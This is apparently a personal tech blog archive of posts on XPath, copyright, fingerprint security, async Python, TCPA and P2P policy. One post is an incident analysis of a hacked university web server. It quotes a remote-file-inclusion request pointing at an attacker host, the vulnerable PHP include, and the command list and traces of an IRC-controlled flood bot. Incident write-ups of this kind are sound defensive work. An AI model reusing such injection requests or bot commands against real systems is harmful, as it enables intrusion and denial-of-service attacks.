There really should be better documentation for this sort of thing. Maybe there is, but Google doesn't find it very well. Anyway...
var result = xmldocument.evaluate(xpath query, xpath root element, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
The xmldocument seems to be able to be any such DOM object - it doesn't have to be connected with the root element so it could, for example, be document. Note that a general Node object wont do - they don't have an evaluate method.
Then the result object has a property snapshotLength giving the number of results and a given result Node object can be obtained by calling snapshotItem(i).
(In-Reply-To: http://locut.us/~ian/blog/archives/26-Alternatives-to-Copyright-FairShare.html)
So there are a number of different proposals for replacing copyright as a model for funding creative artists (or whatever you wish to call them). Some of them I cringe at, generally they propose a government authority which decides what is `art' and dishes out money to it. Much like a lot of direct government funding of the arts does today. I think I'm cringing in the same way that Ian does at such an idea; I mean 'government', 'art', 'committee' - doesn't it make you cringe? It's almost as bad as 'government', 'NHS', 'national IT project' - but that one actually makes me sick; different story.
So there are also less cringe-worthy proposals such as Fairshare. These are usually based on a market, or at least a model of interacting, self-interested parties. But many people of a certain persuasion hear the word property in `intellectual property' and light up. I think the word association goes something like 'property' → 'no government needed' → 'good'. As far as I can see it's that simple.
I keep hitting these people and they really should know better. Let's look at the difference between the government giving out grants and the current copyright system. In the former we are all forced to give up something (money, via taxes) and this is distributed to others via a process (arts boards, funds etc). In the latter we are all forced to give up something (our right to copy freely) and this is distributed to others (copyright holders). This does lead the actually money being distributed via a market system as opposed to government committee, which is a fairly neat hack, but it has ceased to work.
Ponder what would happen if everyone on Earth suddenly had the ability to duplicate physical objects. You could go to a dinner party, really like the wallpaper and, with a click of the fingers, have it in your own house. I would bet that everyone would, within a week, be required to register and have all their fingers broken. Because it preserves the market, right? And markets are good, even when they're a bastard warping of reality caused by the mass of government distorting space-time around it, right?
(In-Reply-To: http://locut.us/~ian/blog/archives/15-An-alternative-to-Senator-Boxer-for-California-Democrats.html)
So one may very well have issues with voting for a libertarian in California given that they can get a little divergent and unhinged in places. But you don't have to agree with the aims of a person to vote for them. Very few Senators are actually going to have a huge impact on the world. One can vote for someone in order to steer the region towards those goals even if one would stop short of agreeing with them. It's also reasonable to interpolate between governments in successive elections.
So I'm now doing UNIX capability systems as a degree project. It was almost managing petabytes but that one lost out for a number of reasons. Progress wasn't bad until the group project started and that has now taken all my time.
In other news. I'm now going to be working for Google full-time come July. At first probably in Zürich and then back to Mt. View. 
Photos of Yosemite are sitting on the server now, I just need to get round to thumbnailing them which will hopefully be fairly soon.
Upgrade your CVS copies of Stackless if you have one. I fixed a bug which was biting me in the course of working the capability project.
Google have a new paper out on MapReduce. Another thing I can now talk about!
So IBM now have a laptop with a fingerprint scanner built in. So, what is this meant to protect beyond passwords? Let's consider the attack cases:
And a few facts from the piece:
Also remember that fingerprints are only secure if you trust the reader and nearly all readers suck. It's very difficult for a fingerprint scanner to tell the difference between a real finger and something which looks just like it, but isn't attached to a person.
In case 1 the attacker knows nothing about you. If you care enough about your data to `encrypt' the hard drive (because, if you don't, they can lift the contents of the disk anyway) they are probably stuffed. A reasonable passphrase is probably enough to stop them as they are mostly after the hardware itself to sell on.
Now, if it has a fingerprint scanner the laptop is probably less secure because the owner's fingerprints are going to be on the laptop or something in the same case. The effort required to break a passphrase is measurable. The effort required with a fingerprint is constant and small if you have the fingerprint in question.
In the second case (assuming that you didn't leave it logged in), there's little chance that someone is going to brute force a passphrase manually. But they could lift a fingerprint and come back next day with a fake made up. Again, you're probably better off with a passphrase.
In the third case you're certainly better off with a passphrase. Since the encryption keys are stored in the hardware in the case of fingerprint security (and laptop hardware isn't very tamper resistant) a break is probably easy for a well equipped group. In the case of a passphrase they either brute force it, or have to install a logger, get it back to you and steal it again. Not impossible, but harder.
So the fingerprint scanner may be neat - but I wouldn't use it on its own.
POSIX 1e ACLs are all very wonderful and so and the big reason that they're wonderful is that you can specify default ACLs which say something like "every file created in this directory should be writable by group foo" That is, until the user creates them with a umask of 022 and the write permission is masked away.
I'm sure that POSIX had a good reason for this somewhere, but umask has never worked very well anyway. So here's a utility which fixes up files which were created with a bad umask. Run it like this
find path -print0 | xargs -0 acldeletemask
So, as Oskar at least has noticed, comments have been removed from this site. This is for two reasons: few people used them - they mostly emailed me anyway; I switched to a new server and couldn't be bothered to setup comments.
But Oskar wanted to take me up on a few points. I'm not posting his email here because it wasn't a public and I haven't asked him.
I linked to an essay a while back about car license plates. The reason I did this is because I thought it put across a good point that ease of access makes a fundamental difference. Often it's suggested that since cars have "always" has license plates, then the introduction of cameras which can log every car isn't a fundamental change.
For most of the time that ID plates have been in operation there has been a cost to looking them up. That cost was in the time it took to do it. Thus there was a fairly inflexible limit to the rate of queries and they didn't have to ban anything because there were no technologies that could do it quicker.
But that cost has now disappeared and reducing the cost of anything to zero usually results in a big effect. We could impose a query limit on the central computer somewhere - but we all know that would be ignored for 'national security' and they could get traffic analysis anyway.
Maybe now the old system (of limited lookups) is impossible we shouldn't have license plates (and maybe we should never have had them), but I don't believe that we'll ever get that freedom back.
Next up, my linking to this Guardian text.
Now, I'm sure that many writers for the Guardian would be very upset at the thought of an unregulated market. All that uncertainty, all that rope to hang oneself with. Much better to have some government take care of all that for me, right? Not as far as I'm concerned and Oskar suggests this report which shows the link between uninterfered markets and their success.
But Kosovo and Iraq aren't examples of corrupt backwards governments being knocked over for the good of the people. The assets of the state are being stolen by force. The people of those countries were forced to buy these `public' enterprises for the state or to give their labour to them - misguided and inefficient as they may have been. That was the first theft and that should be righted as much as possible by giving the people ownership of them. If they then choose to sell to someone else that's their business.
But, unsurprisingly, what's happening is that these assets are being sold off to outside groups with the proceeds disappearing into the mists of government. The spoils of war, right?
Just to make it clear - I don't think that RPOW is going anywhere practically. A currency backed by a non-scarce resource isn't going to work. Worse yet, Moore's Law suggests an inflation rate of about 160% per year, right?
(background reading: PEP 334)
Can you believe that I'm still going on about async IO programming? Well if someone would get it right I could shutup
My current framework du jour is one I did myself based on Stackless. Yes, I've played with Twisted a lot, and I'm not a huge fan. For one, the core itself isn't 1.0 standard (the reactors still have stupid bugs where they listen on closed sockets and short circuit) and the http code is unusable in a hostile environment.
Stackless provides user-land threads and my framework is pretty standard. The main problems are that having to patch the python interpreter is a pain and there are a few parts of Stackless that I don't quite understand - mostly because the documentation isn't there.
PEP 332 promises some of same things as stackless - but in the standard CPython. Let's look at a Python generator:
def gen():
a = 1
yield a
yield 2
This function returns multiple values and keeps state between invocations. The ability to keep state is very similar to user-land threads and one can easily imagine a generator which yields values from a socket. However, when the operation blocks the generator would have to yield a out-of-band value to denote this. Every use of the socket generator would then have to handle this - dragging the code quickly into the realm of the unreadable and unwritable.
This issue is very similar to error handling and we have a way to cope with this - exceptions. So the idea of PEP 334 is to allow generators to raise a SuspendIteration exception without destroying themselves. (At the moment, once a generator has raised an exception it is finished.) The SuspendIteration would carry a payload of the objects which it is blocking on.
The top of the call chain would be the IO core which would call each top-level suspended iterator (which would call others etc) until it hit a blocking IO operation and raised SuspendIteration. This would run back up the call chain and the IO core would make note of which objects (sockets etc) which that generator is blocking on. Later if those objects become ready the generator can be called again and allowed to progress.
So the first issue is that there's no way to poke an exception into the bottom of a generator. (The ability to poke a TimedOut exception is very useful.) But, so long as all the blocking objects (wrappers around sockets, Channels, Mutexes etc) pay attention to a global variable they could be made to raise a given exception.
Thus I cheer PEP 334 onwards because it could lead to a nice IO framework that works in all the pythons without patching.
So, I'm done. And I cunningly left before anything major that I wrote was used in anger
Just random things: TiddlyWiki is very cool. Mix in a little WebDAV and XMLHttpRequest and it would be really useful.
Good essay from Mr Schneier again.
The Hitchhiker episode went out and I quite liked it. I perfer the old Book and I don't think the script is quite as sharp this time (but how could it be?) - but I like it. I've written code to record RealPlayer to OGG, but it's a pain to use and I don't I have it on my laptop. Maybe I'll be able to record next week's
Another series that I wish I had recorded (still going) is Mr Hardy's current work. Probably the best thing on radio at the moment.
Long time - no post. And even now it's not going to be very long.
It's my last week at Google and it's going to be a very busy one. Of course, I can't say what I'm doing but maybe one day it will be public and I can point.
But more importantly - and I'm sure that readers will know this, but - the new Hitchhikers series starts today in about 11 hours. This is not optional. If you don't listen to this people will be spitting at you on the street tomorrow. Well, may not, but I happen to think that you should listen. In years gone by I could (with a little prompting) receit most of the original radio series.
So, you have your mission for the day and while you're waiting maybe you should read this. With the `second war' starting in Iraq (e.g. they've run out of space under the carpet) and all. Freeing people sure seems to cost of lot of money and lives.
Slashdot: Google has now taken it one step further and created a word-identification script filter as part of the login process.. Let's clear this up no they haven't.
I can only assume that what this person is seeing is the anti-bruteforce measures which only kick in when you trigger an alarm that a script is trying to brute force your password. Good luck finding anyone on /. who has actually checked the publically accessable frontpage to see that the story is crap.
Switched servers. This is more a message for me so that I know which server I'm looking at!
A little while back all the talk was of Palladium and how `trusted hardware' was going to bring forth an end to general purpose computing. (I'm not ridiculing that notion - it may happen, though I think it's less likely now.) I remember being in a hotel in Guildford at the time so I guess that was summer 2002.
People were horrified at this prospect and never have so many people linked to a A Right To Read in such a short span of time. But I was arguing something different at the time:
Just because TCPAv1 *may* be a stepping stone towards something bad doesn't automatically make TCPAv1 bad. As Hal and I have pointed out, TCPAv1 has a number of interesting uses and I, for one, will not be asking people to boycot it.
Now, I don't pretend that anyone gave two hoots about what I thought once Hal popped up. But this is a kind of "told you so" link because Hal has now gone and proven that there is a use to this stuff with RPOW.
Normally POW tokens can't be reused because that would allow them to be double-spent. But RPOW allows for a limited form of reuse: sequential reuse. This lets a POW token be used once, then exchanged for a new one, which can again be used once, then once more exchanged, etc. This approach makes POW tokens more practical for many purposes and allows the effective cost of a POW token to be raised while still allowing systems to use them effectively.
I'm not yet convinced that RPOW is actually very useful, but that isn't the point. The point is that I have a strong chain of trust that Hal's server does what he says it does. It's running on an IBM 4758 and IBM publishes the root key for that in lots of places, including every printed manual. That keys signs the onboard key of the 4758 and the 4758 signs that code that it's running. I have a decent amount of trust in IBM because they are certified by NIST and they sell lots of these to the banking sector - so they have a strong financial interest in keeping things above board.
This is a fundamentally different primitive to those which we are used to dealing with. Usually we need either reputation systems, trusted third parties or verifiable proofs of correctness (very rare). In a sense IBM here is a trusted third party but they are one level removed; we aren't trusting them to implement some protocol, but to make devices which can be configured to implement the protocol. There's a saying that every problem in computer science can be solved by implementing another layer of abstraction so we should be pretty excited about what this new layer gives us.
Of course, it's not some magic bullet. Not very many people have 4758's they aren't going to become standard anytime soon. Also, they are pretty slow. But can do a number of things which I couldn't do before:
I could implement a notary public and people would have a strong trust that it functioned correctly without knowing anything about me. I can do stuff like Hal's RPOW (or a number of financial things) and people could verify that I wasn't doing anything untoward etc. I'm sure that more ideas will pop up now that this is in our collective mental toolkit.
How this relates to TCPA:
Now, TCPA also includes remote attestation (the ability to sign the running code) but I feel that this is almost completely useless. For a start there will probably be a number of producers of TCPA chips and this dilutes the trust quite a lot already. Secondly, TCPA chips aren't going to be nearly so hard to subvert as a 4758. The 4758 isn't perfect (no tamper-resistance is), but FIPS level 4 says it's pretty good. Thirdly, it's utterly pointless for the TCPA to sign a Linux or NT kernel image; the trust flowing through either of those to a given running application (assuming that they had been modified so that they could sign the code that they were running) is tiny. At best, the application would have to implemented as a very stripped down kernel - making the box useless for anything else.
But TCPA does have sealing (the ability to encrypt data keyed by the fingerprint of the running kernel). the first two points above still apply, but what I want this for to is to storing the encryption key for the hard drive so that it cannot be removed and inspected on another computer (or booted with another kernel from a floppy etc).
So I still think that TCPA has a place … but not remote attestation.
Seeing an email titled "UMMMM.... BAD BAD THINGS ON HEEPS" isn't the best start to a day. In fact, I would go as far as to say that it sucks.
So heeps is heeps.union.ic.ac.uk, also known as www.union.ic.ac.uk and a whole lot of other hosts. the email from Sam:
sjs298@heeps music $ sudo ps aux | grep pra Password: www_soc 12644 0.0 0.0 1420 236 ? S Jul21 0:00 ./pra sjs298@heeps music $ sudo netstat -ap | grep pra tcp 0 0 *:18383 *:* LISTEN 12644/pra sjs298@heeps music $ telnet localhost 18383 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. sh-2.05b$ whoami whoami www_soc_medic_music sh-2.05b$ Now I'd class that as a Hack... probably via PHPBB. /www/doc_root/medic/music/forums < PHPBB 2.0.4
Certainly phpBB has been a pain in the past and this is why all php scripts run as a special, per group, user on heeps. But ok, not a huge deal. Security measures had worked, they didn't seem to have root and there were all manner of limits in place.
We also have great logging:
Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /bin/bash (sh -c /tmp/dsadas;rm -f /tmp/dsadas ) by (php:26669) UID(9113) EUID(9113), parent (php:30434) UID(9113) EUID(9113) Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /tmp/dsadas (/tmp/dsadas ) by (sh:4796) UID(9113) EUID(9113), parent (sh:26669) UID(9113) EUID(9113) Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /tmp/upxDC5HNIQAEV2 (deleted) (/tmp/dsadas ) by (dsadas:4796) UID(9113) EUID(9113), parent (sh:26669) UID(9113) EUID(9113) Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /bin/rm (rm -f /tmp/dsadas ) by (sh:9657) UID(9113) EUID(9113), parent (sh:26669) UID(9113) EUID(9113)
Fairly standard. Unfortunately we didn't have the binary (it was deleted) and it was killed before we remembered to grab it out of /proc.
Looking in the logs:
www.union.ic.ac.uk 65.102.167.50 - - [12/Aug/2004:23:13:15 +0100] "GET /medic/music/index.php?id=http://65.102.167.50:113/&width=http://65.102.167.50:113/ HTTP/1.0" 200 48920 "-" "Lynx/2.8.3dev.8 libwww-FM/2.14"
So it wasn't phpBB. There's a first. (nb: I'm sure that recent versions of phpBB are wonderfully quickly patched etc, but most of our users can't be bothered to keep track of recent versions.) The code at fault was fairly obvious:
if ($_GET['eventreview']) { @include "8.php" ; $id="8.php"; } elseif ($event)
{@include "2.php"; $id="2.php";} elseif (!$id) { @include "1.php";
$id="1.php" ; } else { include "$id"; } ;
It include'ed a user controled string and someone just pointed it at an external webserver. Boilerplate.
Further information in the logs showed that most of the server had been crawled a few days beforehand. Any URLs with parameters in them were tried again while replacing the parameter value with an external php file which ran id or uname -a. Looks like an automated crawled designed to find scripts with these holes. This crawl was comming from a number of different hosts, using a number of different external values.
Ok, fine. Email the owner of the source IP address (probably a compromised box), disable the offending code, email the owner of said code. Easy. Done.
Sam collected together some random files owned by the compromised account in /tmp. Of these, there was a binary called moo. Strings suggests that it's an IRC controlled flood bot:
NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers NOTICE %s :UDP <target> <port> <secs> = A udp flooder NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder NOTICE %s :NICK <nick> = Changes the nick of the client NOTICE %s :SERVER <server> = Changes servers NOTICE %s :GETSPOOFS = Gets the current spoofing NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet
Ok, semi interesting. A few hours later (I am supposed to do some work at Google sometimes!) I came back to check around. Everything looks ok, though ifconfig is showing a lot of traffic. lsof -i -n … oh crap
… moo processes - flooding some poor bastard. (Did I say that heeps is on a 100Mb/s link to the Internet?).
Panic. Kill them. Shutdown apache, vsftpd, everything. Move sshd onto a different port. Does ps auxw show anything odd? Nope. lsof or netstat? Nope. Packet counts? Epsilon. Root compromise? Possible; but ps auxw showed the moo processes - if that's a rootkit it sucks.
Look in the logs:
Aug 13 16:03:50 heeps grsec: From 155.198.78.202: exec of /tmp/moo (./moo ) by (bash:14746) UID(1246) EUID(1246), parent (bash:17808) UID(1246) EUID(1246)
So the flooder process had been running for about six hours. No - I'm not even going to work out how much data you can push down a 100Mb/s link in six hours. UID 1246? That's Sam. Did he accidently run the damm payload? Is the box rooted? Fundamentally, does moo do anything more than strings suggests? I need to know exactly what moo does.
So setup a chroot jail here at Google. Put strace in it, su to a random UID and setup a firewall to stop that UID contacting the outside world.
2808 open("/usr/dict/words", O_RDONLY) = -1 ENOENT (No such file or directory)
2808 socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
2808 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
2808 connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
2808 send(4, "\217Z\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\4corp\6g"..., 46, 0) = -1 EPERM (Operation not permitted)
2808 close(4) = 0
2808 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
2808 connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
2808 send(4, "\217Z\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\4corp\6g"..., 46, 0) = -1 EPERM (Operation not permitted)
2808 close(4) = 0
2808 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
2808 connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
2808 send(4, "\217Z\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\4corp\6g"..., 46, 0) = -1 EPERM (Operation not permitted)
2808 close(4) = 0
2808 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
2808 connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
2808 send(4, "\217[\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\0\0\1\0\1", 30, 0) = -1 EPERM (Operation not permitted)
2808 close(4) = 0
2808 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
2808 connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
2808 send(4, "\217[\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\0\0\1\0\1", 30, 0) = -1 EPERM (Operation not permitted)
2808 close(4) = 0
2808 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
2808 connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
2808 send(4, "\217[\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\0\0\1\0\1", 30, 0) = -1 EPERM (Operation not permitted)
2808 close(4) = 0
...
That's edited a lot. It just started flooding DNS requests. So, I let it contact a DNS server and connect to irc.efnet.nl.
2837 connect(3, {sa_family=AF_INET, sin_port=htons(6667), sin_addr=inet_addr("193.109.122.77")}, 16) = 0
2837 setsockopt(3, SOL_SOCKET, SO_LINGER, NULL, 0) = -1 EINVAL (Invalid argument)
2837 setsockopt(3, SOL_SOCKET, SO_REUSEADDR, NULL, 0) = -1 EINVAL (Invalid argument)
2837 setsockopt(3, SOL_SOCKET, SO_KEEPALIVE, NULL, 0) = -1 EINVAL (Invalid argument)
2837 write(3, "NICK MXQC\nUSER HNMKFQ localhost localhost :LTQQEFD\n", 51) = 51
2837 select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1200, 0})
2837 recv(3, "NOTICE AUTH :*** Looking up your hostname...\r\nNOTICE AUTH :*** Checking Ident\r\nNOTICE AUTH :*** Found your hos
tname\r\n", 4096, 0) = 117
2837 select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1190, 600000})
2837 recv(3, "NOTICE AUTH :*** No Ident response\r\n", 4096, 0) = 36
2837 select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1199, 830000})
2837 recv(3, "PING :936DFE7C\r\n", 4096, 0) = 16
2837 write(3, "PONG :936DFE7C\n", 15) = 15
2837 select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1199, 820000})
2837 recv(3, ":irc.efnet.nl 001 MXQC :Welcome to the EFnet Internet Relay Chat Network MXQC\r\n", 4096, 0) = 79
2837 write(3, "MODE MXQC -xi\n", 14) = 14
2837 write(3, "JOIN #krowy :krowa\n", 19) = 19
...
So it joins a private IRC channel. I can do that. A @google.com address got me banned pretty quickly. But not before I got a whois on everyone there:
--- [FDMYSGLM] (GIWcF7CNSH@badboy.icyhost.com) : UUTIDJJH --- [FDMYSGLM] @#krowy --- [FDMYSGLM] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server --- FDMYSGLM 66.98.130.9 :actually using host --- [FDMYSGLM] idle 49:13:19, signon: Tue Aug 10 15:54:49 --- [FDMYSGLM] End of WHOIS list. --- [forger] (konrad@aay116.neoplus.adsl.tpnet.pl) : I'm too lame to read mirc.hlp --- [forger] #hihaho #test45 @#krowy --- [forger] irc.efnet.pl :Discover a lost art - www.marillion.com --- [forger] End of WHOIS list. --- [its`me] (~ludziu@nat-0.infoland.int.pl) : ^=^ --- [its`me] @#krowy --- [its`me] irc.efnet.pl :Discover a lost art - www.marillion.com --- [its`me] End of WHOIS list. --- [MQJJEBR] (~WTKC@pc-212-51-219-2.p.lodz.pl) : DILLEUN --- [MQJJEBR] @#krowy --- [MQJJEBR] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server --- MQJJEBR 212.51.219.2 :actually using host --- [MQJJEBR] idle 49:13:27, signon: Tue Aug 10 16:01:19 --- [MQJJEBR] End of WHOIS list. --- [ori00n] (h4x0r@dial-770.wroclaw.dialog.net.pl) : l33t --- [ori00n] #test45 #cc @#krowy --- [ori00n] irc.efnet.pl :Discover a lost art - www.marillion.com --- [ori00n] End of WHOIS list. --- [YDMOCCRO] (~KQFU@banks.su.nottingham.ac.uk) : JHASTZIH --- [YDMOCCRO] @#krowy --- [YDMOCCRO] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server --- YDMOCCRO 128.243.90.87 :actually using host --- [YDMOCCRO] idle 49:13:32, signon: Tue Aug 10 16:48:28 --- [YDMOCCRO] End of WHOIS list. --- [agl] (~agl@216-239-45-4.google.com) : agl --- [agl] #krowy --- [agl] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server --- agl 216.239.45.4 :actually using host --- [agl] idle 00:00:49, signon: Fri Aug 13 14:07:34 --- [agl] End of WHOIS list. --- [MITPIXPN] (~BJSAQXGU@211.239.197.130) : MIHSH --- [MITPIXPN] #krowy --- [MITPIXPN] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server --- MITPIXPN 211.239.197.130 :actually using host --- [MITPIXPN] idle 00:18:13, signon: Fri Aug 13 13:50:23 --- [MITPIXPN] End of WHOIS list. --- [NKKXLTC] (www-data@rei.animehq.hu) : WSOV --- [NKKXLTC] #krowy --- [NKKXLTC] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server --- NKKXLTC 195.70.50.20 :actually using host --- [NKKXLTC] idle 00:19:31, signon: Fri Aug 13 13:49:00 --- [NKKXLTC] End of WHOIS list. --- [PHQW] (~FNWDDYH@dsl-213-023-046-090.arcor-ip.net) : SYEV --- [PHQW] #krowy --- [PHQW] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server --- PHQW 213.23.46.90 :actually using host --- [PHQW] idle 00:11:23, signon: Fri Aug 13 13:57:17 --- [PHQW] End of WHOIS list. --- [VQMVYOHE] (~WEEBA@211.239.197.130) : HBQFDHTF --- [VQMVYOHE] #krowy --- [VQMVYOHE] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server --- VQMVYOHE 211.239.197.130 :actually using host --- [VQMVYOHE] idle 00:18:09, signon: Fri Aug 13 13:50:34 --- [VQMVYOHE] End of WHOIS list.
Looks like forger is running the game as he quickly kicks the jailed moo bot that I'm running (also from @google.com). He then changes his nick to shitniz, like it will help.
But thankfully moo seems to do exactly what it says on the tin; so probably not a problem. Oh, and that channel is now invite only. I guess he got scared. shitniz is still there thou.
Patch to add SPF to Gentoo qmail.
Based on http://www.saout.de/misc/spf/
Did you know that .org pushes now happen about every 5 minutes? I was certainly pretty surprised last night. Now if only they didn't have silly registration and server number restrictions at the gTLD level the DNS system might not be a complete pile of doggy poo.
And the reason why I was playing with DNS is that IV now has a new mail server. Say hello to zool.imperialviolet.org every one, the third server to have an .imperialviolet.org name (I wonder if anyone here remembers tzu and metis?). Hopefully this should fix the mail bouncing problems that dodo was having. And, if anyone wants hosting for mail servers etc now is the time to ask.
The switch of servers has broken automatic email bots (that's comments and keyverify), but I'm running them manually at the moment so you can still use them all the same. And boy do people use keyverify a lot. I wasn't expecting any traffic but I've had to deal with about 10 messages today from that.
I was being a little silly yesterday. If one was going to implement a new backend for the gmail javascript, there's an obvious choice ... gmail. Gmail does a perfect job of storing and sorting mail, just forward the queries onto them!
Before you wonder what the hell the point of re-backing gmail only to forward them to the real gmail is, remember the motivation. I want email messages to be sent from the right place, with the right From address so all I have to do is intercept the "send email" POST and a) send the email from zool b) send it onto gmail with a blackhole email address.
That's it. Now, if you don't like the idea of gmail storing your email then you really do have to do the whole thing. But I know that gmail stores lots of copies of my mail and that they aren't profiling it. For the moment I'm happy with Google managing my email and this simple solution is great (I think that would go for many people).
But after a while, someone needs to make a change, and inevitably, they break your code. Do you suppose they'll notice? Not likely. But you will, when google.com starts serving elephant porn on 11 million searches. Stop elephant porn before it starts by writing unit tests for all your code.
Why hasn't anyone back-ended gmail? Seriously, it's a client side app, that means you can take the javascript and reimpliment the server. It's not that hard! Lots of people seem to be doing different clients for gmail (injectors, notifiers etc) - but I want a different backend!
I don't want my address to be @gmail (and Reply-To isn't good enough). At the moment the server which handles imperialviolet.org email is upset so I don't even have my Reply-To set. But I'm switching to a different server soon and I want a gmail server to install!
Seriously, it's easy, I copied implimented a NULL backend for gmail in about 30 minutes. The list of email is static and nothing actually works but all the data looks like:
D(["t",["fe4e30d37ca51d9",0,0,"7:11am","\<span id=\'_user_rmages@linux-azur.org\'\>Rene Mages\</span\>"," ","Software Patents : Postcard Action", "Hi all, Probably, the EU Software patent Directive should return to the European Parlement during …",[] ,"","fe4e30d37ca51d9",0]
It's not that tough. Python provides mailbox parsing, IMAP clients etc (if you want).
Unfortuantely, I don't have the time.
A quick commentary on the letter sent by many attorneys general the `peer-to-peer software' producers.
At present, P2P software has too many times been hijacked by those who use it for illegal purposes to which the vast majority of our consumers do not wish to be exposed.
I hate to point out that the reason that most people use P2P networks is to be exposed to these `illegal purposes'. Look at the usage numbers for Napster before and after it went `legal'.
P2P file-sharing technology works by allowing consumers to download free software that enables them to directly share files stored on their hard drive with other users. This type of direct access to one's computer differentiates P2P file-sharing technology from garden-variety e-mail accounts and commercial search engines such as Google and Yahoo.
As opposed to the bleeding obvious differences between P2P and email/search engines?
One substantial and ever-growing use of P2P software is as a method of disseminating pornography, including child pornography.
Yep. True at least.
Consequently, P2P users need to be made aware that they are exposing themselves, and their children, to widespread availability of pornographic material when they download and install P2P file-sharing programs on their computers.
While sensible I'm guess that most people realise this. Esp after their first IE session where after they are let with dozens of popup windows of porn.
Furthermore, P2P file-sharing technology can allow its users to access the files of other users, even when the computer is "off".
Seriously, no. It really can't.
P2P users, including both home users and small businesses, who do not properly understand this software have inadvertently given other P2P users access to tax returns, medical files, financial records, personal e- mail, and confidential documents stored on their computers. ... Consequently, P2P users need to be properly educated so that they will not inadvertently share personal files on their hard drives with other users of your P2P file-sharing technology.
And this is small fry when compared to the amount of information leaked by viruses, photocopiers and leaving one's breifcase on the roof of the car as you drive away. (And, in the case of the British secret service, leaving your laptop in the pub). Since when do attorneys general bother themselves with people being stupid?
The illegal uses of P2P technology are having an adverse impact on our States consumers, economies, and general welfare.
Of course, this statement is asserted without justification and is debatable at best.
P2P file-sharing programs also are being used to illegally trade copyrighted music, movies, software, and video games, contributing to economic losses. The Business Software Alliance estimates that its members lost $13 billion in revenue last year due to software piracy. According to a February 20, 2004 CNN article, U.S. software companies lose up to $12 billion a year in piracy according to the Software and Information Industry Association. Music companies lost more than $4.6 billion worldwide last year, according to the RIAA [Recording Industry Association of America] and movie industry officials pegged their annual losses from bootlegged films at more than $3.5 billion.
at least here they give their sources, and what independant sources they are too. Generally `losses', as calculated in these figures are an estimate of the number of copied works (rounded up) times the retail cost. Which is assuming that every download is a lost sale.
We would ask you to take concrete and meaningful steps to avoid the infringement of the privacy and security of our citizens by bundling unwanted spyware and adware with your software.
I don't think they actually meant what they wrote here, but it's at least a little ray of light if I'm reading it (in)correctly.
Encryption only reinforces the perception that P2P technology is being used primarily for illegal ends. Accordingly, we would ask you to refrain from making design changes to your software that prevent law enforcement in our States from investigating and enforcing the law.
I think that law-enforcement already has plenty of powers to deal with this - upto and including installing keyloggers on suspect's computers.
We believe that meaningful steps can and should be taken by the industry to develop more adequate filters capable of better protecting P2P parents and children from unwanted or offensive material. Not warning parents about the presence of, and then reasonably providing them with the ability to block or remove, obscene and illegal materials from their computers is a serious threat to the health and safety of children and families in our States.
What the hell are `P2P parents'? Most of the parents I know are of the regular kind, and that kind are perfectly capable of supervising their children.
| / | Root |
| Alternate | The Weird and Wonderful |
| Backlinks | What are backlinks |
| John Gilmore | What's Wrong with Copy Protection |
| Archives | Blog Archives |
| One | Archive 1 |
| Two | Archive 2 |
| Three | Archive 3 |
| Four | Archive 4 |
| Five | Archive 5 |
| Six | Archive 6 |
| Seven | Archive 7 |
| Eight | Archive 8 |
| Nine | Archive 9 |
| Ten | Archive 10 |
| Eleven | Archive 11 |
| Twelve | Archive 12 |
| Thirteen | Archive 13 |
| Fourteen | Archive 14 |
| Fifteen | Archive 15 |
| Sixteen | Archive 16 |
| Seventeen | Archive 17 |
| Eighteen | Archive 18 |
| Nineteen | Archive 19 |
| Twenty | Archive 20 |
| Twenty One | Archive 21 |
| Twenty Two | Archive 22 |
| Twenty Three | Archive 23 |
| Twenty Four | Archive 24 |
| Twenty Five | Archive 25 |
| Twenty Six | Archive 26 |
| Twenty Seven | Archive 27 |
| Twenty Eight | Archive 28 |
| Twenty Nine | Archive 29 |
| Photos | Poor People Caught on Film |
